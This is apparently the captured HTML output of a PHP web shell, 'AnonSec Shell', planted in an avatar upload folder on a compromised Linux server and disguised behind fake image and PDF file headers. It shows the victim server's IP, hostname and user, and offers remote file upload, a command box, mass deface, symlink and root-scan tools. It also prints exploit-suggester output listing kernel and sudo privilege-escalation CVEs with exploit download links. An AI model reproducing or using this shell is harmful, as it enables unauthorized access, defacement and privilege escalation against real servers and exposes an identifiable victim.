ÿØÿà JFIF ÿþ;
%PDF-1.5 
%����
ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá
TÎ{¦?§®¥kuµùÕ5sLOšuY<!~þÇŠ£®¥os²¦Þ÷M3ݘ<‚_´ÌóFw¼YLYM'O.ºë1ÞŽ
ÿØÿà JFIF 

  
 
  ÿá lExif  II*     1
    2         i‡ 
   :       Google        0220  
        
   `      ÿÛ „ 	  &" '' '''%%'&'"'&% '&&%'''%%"%&%&&!!'/-&-(%-.0%5-'2%
'
%PDF-
<!DOCTYPE html>
<html>
<head>
<title>AnonSec Shell</title>	<meta name="robots" content="noindex">
	<link rel="icon" href="https://i.imgur.com/Be4uoSM.png" type="image/x-icon">
</head>
<body bgcolor="#1f1f1f" text="#ffffff">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
	@import url('https://fonts.googleapis.com/css?family=Dosis');
	@import url('https://fonts.googleapis.com/css?family=Bungee');
	@import url('https://fonts.googleapis.com/css?family=Russo+One');
body {
	font-family: "Dosis", cursive;
	text-shadow:0px 0px 1px #757575;
}

body::-webkit-scrollbar {
  width: 12px;
}

body::-webkit-scrollbar-track {
  background: #1f1f1f;
}

body::-webkit-scrollbar-thumb {
  background-color: #1f1f1f;
  border: 3px solid gray;
}

#content tr:hover {
	background-color: #636263;
	text-shadow:0px 0px 10px #fff;
}

#content .first {
	background-color: #25383C;
}

#content .first:hover {
	background-color: #25383C
	text-shadow:0px 0px 1px #757575;
}

table {
	border: 1px #000000 dotted;
	table-layout: fixed;
}

td {
	word-wrap: break-word;
}

a {
	color: #ffffff;
	text-decoration: none;
}

a:hover {
	color: #000000;
	text-shadow:0px 0px 10px #ffffff;
}

input,select,textarea {
	border: 1px #000000 solid;
	-moz-border-radius: 5px;
	-webkit-border-radius:5px;
	border-radius:5px;
}

.gas {
	background-color: #1f1f1f;
	color: #ffffff;
	cursor: pointer;
}

select {
	background-color: transparent;
	color: #ffffff;
}

select:after {
	cursor: pointer;
}

.linka {
	background-color: transparent;
	color: #ffffff;
}

.up {
	background-color: transparent;
	color: #fff;
}

option {
	background-color: #1f1f1f;
}

.btf {
	background: transparent;
	border: 1px #fff solid;
	cursor: pointer;
}

::-webkit-file-upload-button {
  background: transparent;
  color: #fff;
  border-color: #fff;
  cursor: pointer;
}

gold {
	color: gold;
}

ijo {
	color: green;
}

merah {
	color: red;
}
</style>
<center>
<font face="Bungee" size="5">AnonSec Shell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=gold>157.90.209.209</font> &nbsp;/&nbsp; Your IP : <font color=gold>216.73.216.129</font> &nbsp;&nbsp;[<a href='?opsi=repip'> <gold>Reverse IP</gold> </a>]<br>Web Server : <font color='gold'>Apache</font><br>System : <font color='gold'>Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64</font><br>User : <font color='gold'>evidenciarevista&nbsp;</font>( <font color='gold'>1049</font>)<br>PHP Version : <font color='gold'>7.2.34</font><br>Disable Function : <font color='red'>exec,passthru,shell_exec,system</font></font><br>Domains : <font color=gold>216 Domains</font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=red>OFF</font> &nbsp;|&nbsp; Sudo : <font color=green>ON</font> &nbsp;|&nbsp; Pkexec : <font color=green>ON</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/home">home</a>/<a href="?loknya=/home/evidenciarevista">evidenciarevista</a>/<a href="?loknya=/home/evidenciarevista/admin">admin</a>/<a href="?loknya=/home/evidenciarevista/admin/vendor">vendor</a>/<a href="?loknya=/home/evidenciarevista/admin/vendor/webmozart">webmozart</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='green'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='red'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://anon7.xyz/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="3" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="uname -a">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/uploads/users/avatar/abf3cfa73cc359ec7ab677af77675857.php'>HOME</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[ <a href='/uploads/users/avatar/abf3cfa73cc359ec7ab677af77675857.php?loknya=/home/evidenciarevista/admin/vendor/webmozart&opsi=bekup'>BACKUP SHELL</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[ <a href='/uploads/users/avatar/abf3cfa73cc359ec7ab677af77675857.php?loknya=/home/evidenciarevista/admin/vendor/webmozart&opsi=lompat'>JUMPING</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[ <a href='/uploads/users/avatar/abf3cfa73cc359ec7ab677af77675857.php?loknya=/home/evidenciarevista/admin/vendor/webmozart&opsi=mdf'>MASS DEFACE</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[ <a href='/uploads/users/avatar/abf3cfa73cc359ec7ab677af77675857.php?loknya=/home/evidenciarevista/admin/vendor/webmozart&opsi=scanr'>SCAN ROOT</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[ <a href='/uploads/users/avatar/abf3cfa73cc359ec7ab677af77675857.php?loknya=/home/evidenciarevista/admin/vendor/webmozart&opsi=esyeem'>SYMLINK</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><center>[ <a href="/uploads/users/avatar/abf3cfa73cc359ec7ab677af77675857.php?loknya=%2Fhome%2Fevidenciarevista%2Fadmin%2Fvendor%2Fwebmozart&opsi=scanr&opsidua=esg&opsidua=autoscan"><gold>Auto Scan</gold></a> ] | [ <a href="/uploads/users/avatar/abf3cfa73cc359ec7ab677af77675857.php?loknya=%2Fhome%2Fevidenciarevista%2Fadmin%2Fvendor%2Fwebmozart&opsi=scanr&opsidua=esg&opsidua=scansd"><gold>Scan SUID</gold></a> ] | [ <a href="/uploads/users/avatar/abf3cfa73cc359ec7ab677af77675857.php?loknya=%2Fhome%2Fevidenciarevista%2Fadmin%2Fvendor%2Fwebmozart&opsi=scanr&opsidua=esg&opsidua=esg"><gold>Exploit Suggester</gold></a> ]</center><br>[+] Loading ...<br><pre>
Available information:

Kernel version: 4.18.0
Architecture: x86_64
Distribution: RHEL
Distribution version: 8.10
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2019-13272] PTRACE_TRACEME

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
   Comments: Requires an active PolKit agent.

</pre><hr><center><br>Anon7 - 2022<br><a href='https://shell.anonsec-team.org/' target='_blank'>AnonSec Team</a></center>